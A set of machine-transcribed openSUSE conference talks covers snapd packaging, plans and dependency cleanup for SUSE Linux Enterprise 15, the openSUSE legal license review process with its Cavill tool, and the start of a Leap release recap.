compiling, running all the integration tests. We have lots of integration tests. And essentially, if the pass list, it means works, there's like very little gaps left. Every time you discover one, we just like try to understand why it happened and fix it. We have very high confidence. That means we can move at a very high speed. That's why we release SnapD almost every two weeks. Sometimes it's more, sometimes less, depending on holidays and stuff. But we are very aggressive. SnapD moves at a very fast pace while being stable. So we also do interesting things with channels. So I can't publish SnapD to the stable channel. I can only publish it to Edge. That's actually done automatically. Our release manager can take SnapD and put it into beta. And from there on, the QA teams and the project manager can go all the way. So there's some lag when something lands in master today. It's going to release to the public in maybe two or four weeks. But anyone can start consuming these things as soon as they want by tracking a different channel. So we have still a couple of things we want to do. We want to test Tumble wheat. We just test the leap now. I think that's going to be very easy. We want to get into factory. So from there on, we just want to be a proper SUSE package. But there's one more thing I'm running out of time. We really would like to have a conversation about a farmer. You guys pioneered a farmer. We took a little bit the next step in some areas. We've extended the kernel features so a farmer can control and mediate more things that user space does. And this makes our security just tighter. A farmer today in SUSE does not have all the capabilities that we have in Ubuntu. And there are a few more patches left. We're upstream in Mozambique. But if you guys would consider staking some of those patches and someone just bug fixes, hello, we would really love to have this conversation about. And finding some help on it as a simple as get, try to use SnapD on your system. Try to Snap something you make yourself like tiny packages. It's a new thing. Give it a try. You can Snap something you love because you use it and maybe the upstream guys have already snapped it. Just look for that. Tell us about it. Tell us how it feels. Maybe something missing. Maybe there's some integration that just doesn't feel right for SUSE. We really want to know these things. And lastly, you can stay in touch. We have a couple of places you can go to meet us. We are on IRC on FreeNode on Snappy. We're also on Rocket, which is like more modern version of IRC where you have to be connected all the time. And we have a fantastic, I can't stress this enough, fantastic forum. We're just full of everything. And all of these things are actually snaps, which is funny. And the last thing is that you can come and visit. We have a sprint next month. So there's details in that link. I'm going to link the presentation. I think we ran out of time. But if you guys want to talk to me about anything snappy, just grab me with a t-shirt and talk to me. Thank you.
Snaps are a new packaging format that allows unmodified binaries to run across a wide variety of distributions. Snapd is the software that manages snaps on a running system. Learn about the basics of snaps, snapd and what is needed to port snapd to OpenSUSE.
10.5446/54449 (DOI)
So, hello, my name is Stefan Bielad. I'm one of those guys, Ludwig referred to as SLEE management. I'm one of the SLEE release managers. And I will talk to you or bring to you a little bit of input and news about the upcoming SLEE Enterprise 15 code. And please be with me. It's a glance into the future. So not everything is set in stone, not everything is final. And there are parts, unfortunately, which I cannot talk about yet, either because they are still so highly discussed that it would be embarrassing to talk about them here or because they are still under NDA. So in the next 20 to 30 minutes, you will get some general information. We will talk a little bit about what's coming. And then I want to talk a little bit about the challenges on the way that we will see there and how this can, will, or may affect you. So be with me. One or two marketing slides. You see from the in, from the Susie Linux Enterprise Server, we have a quite a different life cycle than your custom from the open Susie. So it's much longer. We are talking about 10 plus three years. So every decision we are currently make for 15 will affect us for the next 13 years. What you can also see there is what we have started with code 12, that we have a yearly release cycle of service packs. That means every year you see a service pack. We had SP2 last year. You are currently waiting for SP3, also on code 12, coming this year. And next year you will have 15 as well as 12 service pack four. Talking a little bit at what this means on the products that we have currently running on the enterprise side. You see we have here SLE11, which is still under support, where you still get updates for. We have SLE12, where we are currently producing the first red bubble on the slide SP3 and are coming up with SP4 after that and the bottom row 15 coming. And so we will have soon three major code bases running in parallel being supported for a short time. Let me start with one thing. We plan to have the first custom ship of 15 in the second quarter of 2018. You may say that's a little bit far out. It's not. In fact, it's 12 months or less. So we are currently working with high pressure to get all the open things fixed and adapted. There's one big change we have compared to code 12. We will deliver the traditional operating server. That means a server that has everything. And we will deliver something that we call SUSE container as a service platform, which is in fact there to host containers and other stuff in parallel. On the schedule side, you see here, we have in July the code drop deadline. In case you wonder what that means, that's for our partners, our software partners, to deliver their part, their codes, their hardware enablement patches, whatever they want us there to have inside of code 15. That means we are working closely together with them currently to get everything there in shape until that. We have then until September time to get everything together for our documentation department so they can update and write and start documenting how code 15 will work. And shortly after that, most likely not all of the documentation will be finished then, but at least hopefully some of it. We will release beta one, which will be the first public beta then that is accessible for everybody. In case you are wondering, no, that's not of course the first milestone we produce. We have several alphas in between and before, but those are internal only so we get time to fix everything that is broken, that is not working to our success, full thinking, or that is hindering us. One beta and then followed by a relatively short release candidate milestones and then in April you will get the gold master followed sometime soon after that the first customership. The gold master candidate case you want is for us internally when we want to have everything ready, so it can be shipped and the first customership is then when we have everything ready so even customers and everybody else can really use it so every mirror has been fulfilled, the download servers are ready and so on. So now to the part that most likely interests you most. So what's coming on the scope side? Yeah, it's a new major code stream. Ludwig said it early on this stage, everything is getting updated. That means we are really looking at every package for an update which is quite a lot. You have seen I think in one of the slides from Richard the tumbleweed had 10,000 packages, Slee has on code 12 currently around between 3,000 and 4,000. It varies a little bit depending on the platforms and with code 15 I expect it to be in the same range. So that's quite a huge number of packages where we have to look at and everything should work together of course. On the platform side no big changes there. You see x8664, S390, little and you empower PC64 as well as ARM. Not twice the usual what you have seen on code 12 will also exist on 15. We will also release at the same time choose images as well as CASP. I'm not sure if you have something here about CASP but I'm pretty sure it will be mentioned in other talks as well so I will not go into too much detail there. One big change that we want to do is we want to enhance the module concept that we had started with code 12. That means we want to get the installation media relatively small. We want to have more produced in small independent or mostly independent building bricks, let's call it in that and build out of these then our products. I looked a lot how to find a picture that would show this in a good way and I admit every picture that I saw and every diagram had its flaws. This one comes close to how it will look like. So we have the common code base that we use for all the products there. One repository where we build all out of it for all the products so they work together. We will build out of that something that's marked here as lean OS. In fact it's our code name for the installation media and we will build out of that various building bricks and I call it that on purpose from which we will then create the various products. And of course also the modules that are on top of these products. That has of course some challenges and we will come to that later. Packages, systems that we have, well I told you already we will update everything. A few numbers here on the kernel side. We will use 4.12 on the G-Lib side, 2.26 and on the GCC side, 7.2. You may notice that all of these 3s are not yet available in a final stable version. We know that. For some we expect them to be there with beta 1. Some of these 3 may not be final yet when we have beta 1 but are in the last phase of their release candidate cycle. So we plan to go with these versions because we think it makes the most sense for everybody. So we will be there a little bit ahead of what is stable. You see there are 3 kind of blocks on the lower end GNOME 3.26 and also we will have valence support so you see we are planning here also for some changes and newer versions and updates. On the right side there is the most interesting part because we plan also to replace some defaults that we had. For example we want to switch from NTP to crony which has some challenges. We plan to switch from the SUSE firewall to firewall D and we are looking currently at this 389DS package system. So there are some huge changes coming and we hope that those will work out nicely. But those huge changes are also producing quite some challenges that we stumbled over. So you have heard we are currently working out of factory and SLEE 15 is based on open SUSE factory. Ludwig said we will fork off at one point in time and that will be in July. Roughly said I am not giving out an exact date here because it will depend a little bit on what we have then, how stable we are and when we will go with stuff that is incompatible and stop for example at some versions of packages. But roughly said it will be most likely mid of July. Until then we will use everything that we have. In the same way as it is on open SUSE factory it's the same packages, the same code that we use there. We have a few adaptions when it comes to the branding packages and we will all that we have there run on open QA tests independent of what is running on open SUSE itself simply because we have some tests there and we want to get everything running smoothly. Of course bugs that we find will go also back to open SUSE factory. We encourage as you have heard from Ludwig the people to submit there. We also ask you as open SUSE contributors to submit if you have bug fixes them early enough so we can see and test them and see if there are side effects on platforms that maybe are not tested as intensively in open SUSE then they are on SLEE. And of course if you are a package maintainer, double project maintainer help us here with accepting stuff early because the sooner we get everything inside the better it is and the earlier we can test it on all the platforms. One thing that is causing me currently a little bit of headaches are dependencies. I am pretty sure you all have a desktop machine with something that is relatively huge installed on top of it and if you install a new package it mostly is that package and that is it. But if you use a rather small installation image or installed system and you try then to install stuff you will find dependencies that are bad that are not good. Why do we want to get these dependencies away or smoothed or made easier? A simple reason we have people who want to have a small install system. We also have people who want to run containers and virtual images that are small and the more packages you add to a system when you do a super in the more unstable and the more unsecured it gets and the more you have to look for side effects. So we want to keep that relatively small and therefore we did a few tests on such a rather small installation and please don't tell me that 650 MB is not small. Yes I know there are people who got it down to 200 MB. I know of one person who claims to have a running system with 50 MB. Yes, but we want it to be upgradable. We want to be able to install packages and a few other things. So this was the compromise we had there. I will show you a few examples on the next few slides. One caveat in advance. These examples are taken at random. Each of those should show you a specific problem. Note that all the numbers you see may not be valid anymore because dependencies change over the time and if you follow OpenSUSE factory closely you can see this. Note that the package maintainers are in most cases not to blame because we have dependencies that are there since ages. The oldest one that I found was from 2003. We have dependencies that are there because upstream thought it would be nice to have it. And some of these dependencies made sense at the time they were added. Some made even in our sense. But of course not necessarily if you want to be on a small system. For all these three examples, and I took them on purpose, that will come a big thank you to the package maintainers who helped to get the dependency solved. I'm not an expert in most of those. So a big thanks for the work they did here. First, you remember I said we want to exchange the SUSE firewall 2 with the firewall D. Looking at SUSE firewall, if you install it on the test machine, nine packages, 41 megabyte. That's not good I thought at the first moment. Then we tried to install the firewall D. Same system, of course. 83 new packages. And 106 megabyte. What? I thought 40 was bad, 106, not good. I'm pretty sure you can't read all the packages there. You should not. But looking at the package list, we noticed three things that fell out. One was firewall D wanted to install Mesa on a system that had no X. Ah, strange. Okay. Python, G object. Yeah. It's clear if you have Python, you get a lot of packages. But maybe there are some things which you can do on the dependency list. D bus 1, X11, I think meanwhile it's called Python D bus, Python 2 or Python 3. So you see this is two, three weeks old. All those pull in several dozen packages. And in the end, you have the firewall D and you end up with 106 megabyte. And the bad thing is the firewall D maintainer can't do anything because it's somewhere in the chain that follows up. Somewhere on Python, G object, on the D bus X11 package, you simply pull in dozens of other stuff. And that's also where Mesa comes into the play. So the Python maintainers and the firewall D maintainers looked at it, changed a little bit on the dependencies, fixed one or two, changed the require here and there to use something different. And then we retried the same thing, but this time also without the recommends. And we had 34 packages suddenly, no longer 80, but 34. And more astonishingly, we were down to 22 megabyte, which is less than where we started from with the SUSE firewall 2. So that was good. That's okay. If you install with, and that's a type on the slide, if you install with the minus, minus recommands, you get a little bit more packages, quite a lot of more, but that's okay then because that's exactly what we expect then from the recommends. But if you install without recommends, then you end up with less dependencies there and less space used than we had before. And all of that simply because the D bus one X11 package was not the best choice there to take. There were some other package that was helpful and that reduced the dependency dramatically. Another case, we stumbled over the Java packages tools. If you try to install Java, you sooner or later get this package and it fetches you lower, it fetches you Python. And that is not necessarily bad on the space side. If you look 40 megabytes, but if you consider that you just wanted to install Java and you end up with Lua as well as Python, that's not good. So we looked into the Java packages tools. The Lua is simply because there's one script that changes a path from absolute to relative for the other way around. And the Python, well, the Python is problematic because the Python stuff is there to help people who use Maven to get everything installed there set up correctly. So Thomas Schwarzal looked into that. He made some changes there, looked a little bit in the Java dependencies. Some of that stuff is already fixed in factory at the moment. Some is currently pending the fix. We are not getting rid of Python because of Maven. But it will get better and we will reduce the dependency chain a little bit. You may say, is it worth it to get it a little bit reduced? I don't have numbers yet because the fixes are still pending. But yes, it's worth because every package really makes a difference. Because at one point in time, the dependency below that package will change again and you suddenly end up again with a big bunch of packages. And if somebody has a good idea how to get Maven support without Python in Java packages tools, speak up and help us there because that will be really good. At the end. All scripts are welcome. Just submit to open source of factory and it will automatically get there. The third one goes CGK. When I first installed that package on the test system, I was astonished because I suddenly ended up with Lip duty five lips. And I was wondering why do I need Lip duty five packages if I want to install GoScript CGK, which is trust some fund support for GoScript. And a little bit of digging into that showed us the reason was simple. There was a requires there on the FT2DMOS package. That requires was introduced 2003. And looking why that is needed and the FT2DMOS is really a big bunch of collection for free type tools, also graphical ones, therefore the dependency to Lip duty five. And it was just needed because in two files, two scripts, FT dump was used. And it was not possible to omit that. So and that's the case when I said the dependency will grow bigger and bigger the more you have packages. We looked how to switch that. And the solution was that we split it the FT2DMOS package into several sub packages. So now you can simply require the FT dump if you need it and don't need to get all the many applications that you have for free type that require the duty stuff. So you can now install it without having Lip duty installed and pulled into. The split is already an open source of factory for GoScript CGK. The change is still pending. But once that is done, that is also reducing the amount of packages brought into. And it's a good example why it's sometimes a little bit of tricky to find the right package to add as a request and why it's sometimes very good if you split your package. So if you're a package maintainer and you consider of having everything in one package, think about the dependencies if it's really needed, if it's useful to have it in several parts. It's obvious when you have plug-ins or anything else. But there are also parts where this is not as obvious, but it makes a big difference. Yeah, that's my call for action for everybody. If you see dependencies that worry you or if you install a package and you suddenly end up with packages where you wonder why is this the case, don't be shy, open a bug report or look into it or even better submit something because that helps us all to get the distribution smaller, to get the stuff that the footprint, let's call it in that way, that we pull into when we update smaller and it helps also with maintaining all that stuff. At the same time, if you create a new sub package, please think about the description. There was a long thread on one of the open Susan mailing lists, so I will not go deeper into that, but opening a bug report or submitting a patch to adapt a description is appreciated. And not everybody knows what is in a sub package, so that is also helpful. And one more thing, advertising a little bit here. With SLEED 12, we started to have public beta. So while with code 11, you had to be one of our partners and be in a partner program to join our beta and were hand selected and had to go through an assessment center and what else, it was not as bad, but nearly to join. We are in SLEED 12, public beta where everybody could join and we plan to have the same thing again for SLEED 15. You have seen beta one will come in September. So you have still time to apply there. We ask for an email address and a few other things as far as I know. Go to the URL that is mentioned there. You can also search on the SUSEB main page for beta program. There is everything you need on information and there is also the way to say I want to join. And then you can get SLEED 15 images relatively soon when every milestone is finished. And published, you have access to it. We are happy about everybody who joins there. We are not promising to fix every bug report there, but we try our best to get everything solved to your satisfaction there. And it's really cool if you join there and get these images early enough so if you are missing something or think something is wrongly configured, you can influence the SUSEB enterprise product and therefore also to a certain degree LEAP because LEAP will also be based on that. So with that, I'm at the end. We have around one minute left, but if there are questions and answers, I'm willing to go beyond that time frame that I have. You got my attention when you said that you were changing the firewall. And what I'm wondering is if I have an application that's dependent on using the CLI or API calls to the old firewall, is that going to break my application? That's a good question. That's why I asked it. And I'm sorry I have no clear answer to you yet. We have a script. We are currently looking into the migration path there, what we can do to make the transition easy. We are not 100% sure if we can cover every case, to be honest. Oh, thank you. But of course, join the public beta and there, I think if you bring it up, if it's not working, then we will look also in these cases. Because I don't want to lie to you, we are not there yet that we can say for sure everything or every situation is supported. I'm pretty sure not seeing what some people do with the firewall and a few other of the old stuff. And in case you ask, I've seen people doing things with a finger server where the finger server was never intended to be used for. So, and we will drop that in case you don't know what a finger server is, don't ask its old stuff from the last century. So yes. Well, I appreciated your comment about not wanting to lie to me because it reminded me of an old story about the difference between a car salesman and a computer salesman. A car salesman knows when he's lying. I'll leave you with that. I just sometimes have no clue, but that's all. You wanted to say something? Also related to the question about firewall, is there any schedule change with regard to the network management infrastructure in SLEE 15? Sorry, I didn't get the last part. Is there any plan to change the network management infrastructure in SLEE 15? Because right now, as I see it, there's basically three solutions that basically exist and need to be maintained somehow. You're talking about Wicked Network Manager and the SISTEMD Network D. It's not so easy to answer. We will definitely keep Wicked. That's for sure. We definitely plan to keep the Network Manager at the moment. We are nevertheless looking into getting all these reintegrated more closely and especially on the system, the Network D side. We see on the upstream side development that's very encouraging. There were one or two years ago still the tendency to use that or to have the main purpose for that only on the cloud stuff. Meanwhile, that intentions for it have changed. We are looking into that and planning to integrate all three, but we will definitely have as main systems the Network D as well as the Wicked. Because for one thing, we don't want to change all the conflicts in a migration. The other thing is we currently don't think SISTEMD Network D is where it should be, for example, for a server infrastructure. Does this answer your question? Yes, it's a pain that we have so many things. That's why we want to integrate it. More questions? If not, then I'm one minute late, but my architect is used to that. Thank you very much.
A short introduction into the plans for SLE 15. You will learn about the schedule, scope, and other details of the next major code stream for SUSE Linux enterprise products.
10.5446/54455 (DOI)
Hi. I'm relieved that not so many people joined this call because the topic is quite complex and I, fortunately, I put the easy tech in the presentation and only realized while writing the talk that it's quite complex problem. About me, I'm Stefan Kuhler. I work for SUSE in the Enterprise Core Department. I used to be the release manager of Open SUSE until the release of Leap and I'm acting as an open QA tools architect and not as a lawyer. So most of the stuff I will tell you is actually bullshit, but take it as an advice from someone who doesn't know licenses to someone else who does not know licenses. And I asked Kirin to be around for overly bullshit stuff that he will correct then, no doubt. The topics of the talk is the whole background of open source licensing, what I describe as licensing hell and then how we actually handle it with an open SUSE, the actual process and I will briefly introduce you to the tool we used that we named computer-aided vicious licensing, short cable. So why are we actually doing legal reviews? Most of you who do packaging will have heard about licensing review, most of them with bad annotations. The problem is that open source comes in many, many flavors. There's no single this is open source, but we as a distribution or even for ST even as the product, we need to have the license to distribute the source and compile it, patch it to users. And with that, with this review, we're trying to protect the users and the customers from any dangers that would arise from not having correct licenses. So one prime example is if someone puts a license to his code not to be used with commercial offering, then actually SUSE does not have the right to distribute this and this would also not be open source. So there's no business for the software in factory because factory is open to the tumbleweed or leap is supposed to be open source only. So what is open source? As I already said, there is no single definition of open source. There are actually many definitions of what is open source. Most people have a feeling for that. There is for a long time, I don't know, the FSF propagating free software, which is more than just the source. It's also about the culture and the politics around free software. We had a great keynote on Friday about from the FSFE on how to, on what all these politics come down to. We have the open source initiative that propagates open source, which is different and there was quite some controversy about this than what free software is. So open source is more generic than free software is. And open SUSE as distribution follows that definition of open source from the open source initiative for code and for content like wallpapers, icon themes, you name it, there are different rules and they are listed in the packaging guidelines. They are mainly about that we know where it's coming from, that there are no trademarks on and no porn. The packaging guidelines even specify that there are better places to get porn. So the open source definition as of the open source initiative, it comes down to four basic points. There are even the actual rules as always with licenses much, much longer. But mainly it is about that it is free for everyone that as in no money, that the source code is available to modify. It also includes that the code is written as a developer would modify it, not some pre-processing or post-processing happen to the source. That the source allows the rivet works. That means you can just take it and do your own stuff with it. And that the source does not discriminate use cases, people, platforms. The discrimination part is actually the longest part of the open source definition because there are many ways you can discriminate and they are listed all of them in pretty great detail. So on the open source.org web page you also find a list of popular licenses that are used in the wild. They name the appuch, I guess this is alphabetically sorted. So we have the appuch license which is not only used for appuch but for a lot of Java packages for example. You have the BST3 and BST2 clause which is also very often used. You have the GPL from the FSF and you have the LGPL which is the Lesser or Library version of the GPL. You have the MIT license which is used for X11 and a lot of Ruby stuff also comes in MIT. And you have the Mozilla public license which is not so much used but it is very popular because the LibreOffice and Firefox are under this license. So as in use of users Mozilla license will be still be very relevant. So to illustrate the concept of licenses I find the icons used by Creative Commons quite nice. So this is actually from Wikipedia if you look up Creative Commons licenses. And at the bottom of the graph you have the all rights reserved license which is actually the default if you don't put the license under any, the code under any license. But on the left side of the colors is actually the rights that are added. And the first right that is added on Creative Commons is the right to share the content or the code in this case which creates then licenses they call CC by ND or NC for non-commercial. So you can actually for example music you can take a track from an artist and share it as long as you don't sample it or create something that you put your name on it or that you can share and use whenever there is no cost involved or no cost to the user involved. The next right there is remix and there you also get into the light green stuff but it is still not open source. Open source only starts when it gets really dark green because then you add even the right to use in commercial products and to modify in this case. The remix part is already there. And there they have a big difference and on the top there is public domain what they call CC0. So it is a pretty long license that says there is no license or there is no problem. You can do whatever you want. There are other licenses that express this but CC0 is the more polite form. But one of the big problems we are having as distribution is that we are not distributing source, we are actually distributing a distribution which contains big mixes of derived works from open source. So you will find the same implementation of an MD5 checksum in many, many packages and they this license the original author then picked the rives into each package using it but the licenses that come with these sources are actually mixed within this binary within our distribution and this mixing of licenses also means mixing of rules which is created which creates basically a new license with new set of rules. And not all open source projects are actually aware that you can't blindly mix open source licenses. Some you can, some you can't but not everyone knows. For example, the version 2 and version 3 of the GPL is actually not compatible but that was a big problem for KDE for example as we had KDE talks in front because KDE used to have GPL only version 2 and Zamba came along with only having version 3 and then there was a big problem and this was I think KDE resolved this by relicensing to version 2 or 3 and but very often licenses have explicit permissions to link certain libraries or certain licenses. One example of a licensing hell I wanted to show you but I'm not so sure about my time as this very, very liberal office I'm doing the presentation in. If you go to the web page it says it's free software. If you look deeper it says it is Mozilla public license but let's see if my monitor, I guess this. So this is the about licensing dialogue which says basically it's Mozilla but if you look the license of liberal office it's actually 189 pages and what Kiran or basically what our legal review process has to do is reviewing this to verify that there is nothing hidden that actually makes it illegal or impossible to redistribute, I'm still scrolling by the way, to make it impossible to redistribute liberal office in open source. So this is what I call licensing hell and I bet every one of you checked this before using liberal office. But fortunately you don't have to because you can trust my presentation skills. You can trust our licensing review and so let's skip the rest of this talk and slide. The one thing that came along some years ago is SPDX which is a common naming for licenses in open source. They have a big list of licenses and there is some committee deciding when there's a new license coming around, if what name it gets and what the official license text to this license is then so that as an open source project or as a distribution or as some vendor I can express my open source licensing in a way everyone understands because it is now clear. So before we had open source I called it the pearl license that pearl is under. Fedora still calls it GPL plus or artistic but the SPDX form that everyone then should have is artistic minus 1.0 or GPL 1.0 plus which means GPL version 1 or later. And this is just a brief example where you can already see that even the BSD version that some say okay I'm BSD comes in so many flavors that it needs more clarification on what exactly is required from the user or the redistributor. So this is some small statistics I created from the legal license database and most of our files in packages are GPL, public domain or BSD3 but you can see the list is quite long but it's dominated by only a couple of licenses. I already lost you I'm sure. So how do we handle this licensing hell? As part of the development process for basically every SUSE and open SUSE project there is something we call submit request you might know and legal auto is some small review bot that is part of this reviewing process and it reviews with help of some application the sources and the spec file of the package and if this combination of licenses is known for this package it will accept the review otherwise it will wait for a lawyer to review the combination and approve it and after that the bot will also approve it and what the lawyer is using is an external application also that the bot talks to and this I will at the remaining time introduce this to you. So we called it cavill after a long brainstorming session on what to name this because it had a very boring name before and the reason why I wanted to have a good name is we want to have this application open source we are not there yet but we are in the process of polishing it so we can actually show it to someone. This application is feeded by review requests from the bot and possibly developers directly and will unpack, will check out the sources from the build services, unpack it recursively and then does on the sources some multi pattern matching which means that it knows how a GPL 2 is marked in the source, it knows how a GPL 3 is marked, how a BSD is marked and it will do this pattern matching quite quick and it will then present the lawyer's summary on what files, what licenses were found and what files and how the combination looks like. The licenses within this tool have a risk associated to it so that they are grouped from more important to less important and each license has a different, a series of pattern associated to it. The reason why we need several I will explain soon enough. All the patterns are checked in parallel on the sources and the longest version wins. If the read me says it's licensed under the GPL we have a license that is called GPL unspecified which needs more research. If the text says licensed under the GPL version 2 then we name this GPL 2 0 and this means only version 2 but if it says licensed under the GPL version 2 or later then we add a plus to the license because then we can mix it with GPL 3. The patterns allow to have a magic key word called skip that allows to ignore an amount of words within the license or without the text. So this is how the legal queue would look like in Cavill. It has the link to the build service request to be reviewed when it was created, the package name and some summary on the license report as we call them but basically the combination. One of these reports for NASN would look like this. They have several licenses that you can see but the most prominent is the purple part, the low risk key words and all rights reserved are just noise in some sense. So the purple part is BSD 2 clause and that's also what the spec file says so the review would be rather quick but there's one GPL 2 0 file in there and the reviewer has to check how this file is actually used. If this is only a test case then this is okay because it's not shipped as part of the binary. If it's content it's also a different story but if it's part of the sources then the overall license changes so this has to be reviewed by someone who's really experienced with all these licenses mixing. Fortunately enough we have even more than one. So the main story is why is this taking so long? Some people complain that the legal review is taking too long or very long and as I try to explain the situation is quite complex and for every file in the source code we have to identify the license that this very file is under and then we have to find the combination of sources that create certain binaries and then determine from there the legal consequences that has. So very often part of the review is finding the build process and finding what library are used and what binary or if certain files or patches are applied or not and so this takes a long time for more complex packages than what I showed you and there's no one working full time on that and no human soul should work full time on this because this is really if you and trust me I tried it if you do this more often in a row you tend up to be really grumpy and reject more than you should reject because I just very annoying to see all this stupid upstream projects doing so many stupid things with licenses and one of the consequences this stupid things that upstream projects has is that we have to create repeatedly new patterns for the same license. The GPL each version has a very specific instruction what you should do if you want to release your source code under GPL you have to add some very just copy and paste some boilerplate to each of your sources and it should be formalized it should really be straight forward pattern matching unfortunately there are literally thousands of variants on how people write the code this markup. The skip variables already reduce the number of variants that we have but still it's insane what people do and this comes from real people really adding extra clauses to the licenses or to the sources people adding just random grammar changes that they felt necessary people that do global search and replace on their sources and unfortunately found a license with that people adding random typos while opening the editor and or trying to quit women I don't know. So for example this is a pretty standard BSD3 license it has three clauses and at the end says otherwise there are no warranties and no event show the copyright owner reliable and blah blah blah the typical licensing stuff you click away when you install software and then you have this which is basically the same conditions and I bet you did not even spot the difference but I blink for you so it's just its contributors or their contributors so it's just the same thing in English but for a machine trying to pattern match it's really sorry what's on video so this is another example of the same thing where people felt like removing stuff or adding stuff in pretty standard licensing so we have for this BSD3 we have I think a thousand five hundred different patterns that all look very much the same but are random iterations of this and it as I said when you do this more often it pisses you off and at some point you want to say to the package who is innocent get your upstream projects fixed or I will not review this. So there are some future plans for this application the most prominent is that we want to open source the application and release it on GitHub the actual underlying algorithm is already on GitHub we need to have these packages associated with a product or project so we can see actually the status of factory if every package has been reviewed and we another point why we need this association is so we can clean up stuff that is no longer relevant and currently the updates are reviewed as basically new packages so we have to have some diff view these are the short term plans and for longer term I am considering investing into machine learning things because the process of defining new patterns is quite boring and as you can see the patterns are very similar so the arriving one from the other sounds technically possible to teach to a machine and the next thing is that I would like to have some pre some support becoming more smart about what things he can approve on itself instead of waiting for someone because it looks very, very similar to another package for example all these not all but there are classes of Perl packages and classes of Haskell packages are basically the same thing so I am if we remove my Antonio's time and my technical problems we have five minutes left so if there is one question I could answer that otherwise I would leave you for lunch. Hi, I once was in a nice packaging workshop with my colleague Daryx and then I found out that the mosquito package that we packaged there is distributed under a license which is called Eclipse public license I think I filed a buck about it and the answer was look into the license it's a standard 3D 3 gloss BSD license but the thing is it's published on the Eclipse website as a copy of the BSD gloss under a new name so and it's also dual license under Eclipse distribution license which is findable in the SPDL format so what do I do there in such a case using the other license or? So the naming license is very common so if I write Cavill and released under GPL you will find several projects that name this license then the Cavill license so they in documentation so they can change the license later without changing the application and I guess this is one of these cases but case by case we have to review if this license actually adds or removes rights from that other license and this is actually what SPDX does and if I remember the case correctly SPDX even had a discussion about it if this is a new license or just a different name for the same license so it's case by case but they then add not the new name to the SPDX list if it's not just a copy okay only if it adds or removes rights or if it's really really really popular already the SPDX discussions are public. Albert what will you do if there's a license update to an existing package? Like if the files change but the package doesn't bother updating the fields. Here question and I have it prepared but I guess it's invisible because of my X render problems. So this is the latest XRDP update to factory and it is held to on legal review because it's really stupid now because the licenses did not really change but to the machinery there's a new combination and the reason being is that there is this is just to give you another example so this is already Apache NGPL in the spec file you can see Apache I'm not sure if you can see what I can see it you can see Apache NGPL and further below you can see LGPL and MIT which don't map to the overall result and there are several other licenses that are for random for random build tools so what happened in XRDP update is it is just a patch update but they updated the build system to latest autoconf macros which and the FSF puts their license in every file so what this brings now is no longer GPL 2 with autoconf exception but GPL 3 with autoconf exception so this is now a new combination to the tool and it waits for the lawyer to approve that the update is fine. That's what I mean we need a diff view quickly because this it's very hard to find a needle in this so what this is what we see we see the package is no longer having the same combination of licenses it used to have and then we held and then we all did for review and this unfortunately goes behind all the other updates. Yeah I'll make it short. You said to trust legal review process so you don't have to go. You've indicated that users should be trusting the legal review process instead of reading the licenses is that just like cross your fingers trust or is there any additional guarantees that the legal review is going to be actually correct. So if you have legal training you sure should read the liberal office license yourself but for everyone else the chances of finding the problems in that license text of liberal office is much much smaller than crossing your fingers. So trust me if I say trust the review process I mean we found we have we this this whole process is still not perfect and as you can see there's so much noise that you that it's not so hard to actually miss something and as no up as to my knowledge no upstream project is using such a process it is we are very likely to be the first to actually find it so but the good news is most open source developers have good intentions when they publish their code so even if they don't use a proper license but just put uploaded to GitHub for them it's already open source so these good intentions is something that the legal review has to take into account as well. So thank you. Thank you for having me patient.
The Legal Review happening in the Factory development process is a black box for many, even though it's very important for keeping openSUSE away from danger. But many only know the downside of this requirement: if the review takes "too long". This presentation is trying to shed light into the black box and show the processes and applications used. Explaining the challenges and pitfalls - and the actions we took to speed up the process.
10.5446/54456 (DOI)
Hi everyone awake. I had enough time sleeping in Richard's talk, so I hope you pay attention now. So welcome. I'm Ludwig, a release manager at OpenSuselib. And my topic today is OpenSuselib, Recap, State and Outlook. So I will tell you about some facts and the history. Then we look at the current state of LEAP42 and the download numbers. And then we take a look into the future, what's coming up this year. So let's start with the Recap. Richard already showed this slide, I think. OpenSuselib up to 13.2 was a branch of our development head branch. So back then it was called Factory. We did a fork basically every 8 to 12 months, stabilized it for a while, and then released it as new distribution. So it had the advantage that it was new every year. But at the same time it had the disadvantage that it was old every year. So it was always a compromise between new and old. Another disadvantage was that it was mostly disconnected from SLES. So SLES was developed independently of OpenSuselib. So we had some overlap, but not much. That's a problem when it comes to maintenance. So even though we had 18 months of maintenance, we only get a limited amount of fixes because Lee engineers mostly work on different versions of the packages. So also the rise of Tumbleweed and Evergreen during the time showed that there's the need for some different model. So Evergreen was an approach to extend the maintenance of the old OpenSuselib beyond the 18 months. And Tumbleweed, as Richard showed before, was an approach to get some packages rolling on top of this stable release. So around the same time of 13.2, we started to work on this new Tumbleweed, as Richard explained it before, which made Tumbleweed a new distribution of its own. So we no longer have this development head branch that is untested, that only contains stuff that is the latest and greatest, but it not integrated. We converted it to a separate distribution and that left room for something else, a more stable version, and that is Leap. So the idea behind Leap is to take slas as bosses. Slas in turn is also based on factory, but stabilized by SUSE engineers, better integrated. So the idea is to take that, put packages from Tumbleweed on top, add more desktops, for example, and then we get also new versions every year, but based on slas. We get easier upgrades because the base system is already tested from slas side. We also get 18 months of maintenance for every release. 18 months is because it's a six-month overlap after the next release, and in total we get more than three years of maintenance for this major version line. So the first one of this kind was 42.1, released in November 2015, and as planned it took the base system from SLEE, and mostly only that from SLEE because slas12 is actually between 13.1 and 13.2. So from an open SUSE perspective, a 42.1 based on SLEE12 was a step backwards, a slide step backwards that can also be seen in the RPM markers where SLEE12 is 13.15. So in between 13.1 and 13.2. So it was hard to judge which packages to take from open SUSE and which ones to take from SLEE to avoid too much going backwards. So 42.1 didn't take the SLEE kernel, but a newer one. It also took GNOME in a newer version because the one from SLEE was perceived as being too old compared to what you get from 13.2. And in the middle of the development process, SP1 was released for SLEE12. So the 42.1 development had to be re-based on the SP1 packages. So overall I kind of considered 42.1 always as some experiment. We didn't know where to go, go more towards the open SUSE side or lean more towards SLEE, share more packages or get more recent ones. Overall I think it worked out for 42.1. One of the major pain points I think was KDE back then. So it wasn't really the best version we had. And this was the default desktop, so kind of embarrassing. That also led me to my rant last year in this conference. We had to release a maintenance update that was a version update for KDE during maintenance and that is not nice to have for a stable release. My struggle we had during the development of 42.1 was also that SLEE didn't adopt this development process of factory yet. So I would think Richard explained in the talk before with SLEE staging and OpenKA that was not adopted by SLEE yet because it was too new. But LEEP already had it. So we saw quite some fallout that was not detected by SLEE. On the other hand, it also showed this less guys that what we're doing there in Tamil read is quite cool and they should adopt it for less. So for 42.2 in 2016 SLEE already 